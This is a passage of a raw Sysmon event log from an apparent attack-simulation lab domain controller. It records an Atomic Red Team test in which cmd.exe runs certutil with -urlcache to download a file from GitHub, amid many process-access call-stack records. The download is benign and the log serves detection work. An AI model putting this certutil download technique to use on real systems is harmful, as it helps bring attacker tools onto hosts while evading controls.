21:49:22.275{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5C8-6058-0B00-00000000AE01}612C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917161Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:22.275{896A638B-B5C8-6058-0B00-00000000AE01}6128092C:\Windows\system32\lsass.exe{896A638B-B5C8-6058-0A00-00000000AE01}604C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917160Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:22.273{896A638B-B5C8-6058-0B00-00000000AE01}6128092C:\Windows\system32\lsass.exe{896A638B-B3E2-605B-6B69-00000000AE01}2208C:\Windows\system32\certutil.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917159Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:22.273{896A638B-B5C8-6058-0B00-00000000AE01}6128092C:\Windows\system32\lsass.exe{896A638B-B3E2-605B-6B69-00000000AE01}2208C:\Windows\system32\certutil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917158Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:22.255{896A638B-B5CB-6058-1600-00000000AE01}13087204C:\Windows\System32\svchost.exe{896A638B-B3E2-605B-6B69-00000000AE01}2208C:\Windows\system32\certutil.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917157Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:22.255{896A638B-B5CB-6058-1600-00000000AE01}13081328C:\Windows\System32\svchost.exe{896A638B-B3E2-605B-6B69-00000000AE01}2208C:\Windows\system32\certutil.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917156Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:22.224{896A638B-FBAD-6058-BF11-00000000AE01}10032C:\Windows\system32\conhost.exe{896A638B-B3E2-605B-6B69-00000000AE01}2208C:\Windows\system32\certutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917155Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:22.222{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917154Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:22.222{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917153Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:22.221{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917152Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:22.221{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917151Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:22.221{896A638B-B8DD-6058-9202-00000000AE01}36325864C:\Windows\system32\csrss.exe{896A638B-B3E2-605B-6B69-00000000AE01}2208C:\Windows\system32\certutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005917150Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:22.221{896A638B-B3E2-605B-6A69-00000000AE01}57202704C:\Windows\system32\cmd.exe{896A638B-B3E2-605B-6B69-00000000AE01}2208C:\Windows\system32\certutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000005917149Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:22.210{896A638B-B3E2-605B-6B69-00000000AE01}2208C:\Windows\System32\certutil.exe10.0.14393.4169 (rs1_release.210107-1130)CertUtil.exeMicrosoft® Windows® Operating SystemMicrosoft CorporationCertUtil.execertutil -urlcache -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt Atomic-license.txt" C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{896A638B-B8E0-6058-1B64-190000000000}0x19641b2HighMD5=BF7CEA72AE186A10239F830F93492A73,SHA256=A50DFE408565C2BB011D013AC43E616B2A595B1D06EB9B083F519672732498DA,IMPHASH=442218E88D4D6AA0BE3165DD7B20A4C4{896A638B-B3E2-605B-6A69-00000000AE01}5720C:\Windows\System32\cmd.exe"cmd /c certutil -urlcache -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt Atomic-license.txt" 10341000x80000000000000005917148Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:22.207{896A638B-FBAD-6058-BF11-00000000AE01}10032C:\Windows\system32\conhost.exe{896A638B-B3E2-605B-6A69-00000000AE01}5720C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917147Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:22.205{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917146Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:22.205{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917145Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:22.205{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917144Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:22.205{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917143Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:22.205{896A638B-B8DD-6058-9202-00000000AE01}36324636C:\Windows\system32\csrss.exe{896A638B-B3E2-605B-6A69-00000000AE01}5720C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005917142Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:22.204{896A638B-B3E2-605B-6969-00000000AE01}70967700C:\Windows\system32\cmd.exe{896A638B-B3E2-605B-6A69-00000000AE01}5720C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000005917141Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:22.204{896A638B-B3E2-605B-6A69-00000000AE01}5720C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"cmd /c certutil -urlcache -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt Atomic-license.txt" C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{896A638B-B8E0-6058-1B64-190000000000}0x19641b2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{896A638B-B3E2-605B-6969-00000000AE01}7096C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "cmd /c certutil -urlcache -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt Atomic-license.txt" 10341000x80000000000000005917140Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:22.201{896A638B-FBAD-6058-BF11-00000000AE01}10032C:\Windows\system32\conhost.exe{896A638B-B3E2-605B-6969-00000000AE01}7096C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917139Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:22.199{896A638B-FBAD-6058-BE11-00000000AE01}4492212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{896A638B-B3E2-605B-6969-00000000AE01}7096C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c01f5|UNKNOWN(00007FFA6D95C033) 10341000x80000000000000005917138Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:22.197{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917137Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:22.197{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917136Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:22.197{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917135Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:22.197{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917134Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:22.196{896A638B-B8DD-6058-9202-00000000AE01}36323472C:\Windows\system32\csrss.exe{896A638B-B3E2-605B-6969-00000000AE01}7096C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005917133Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 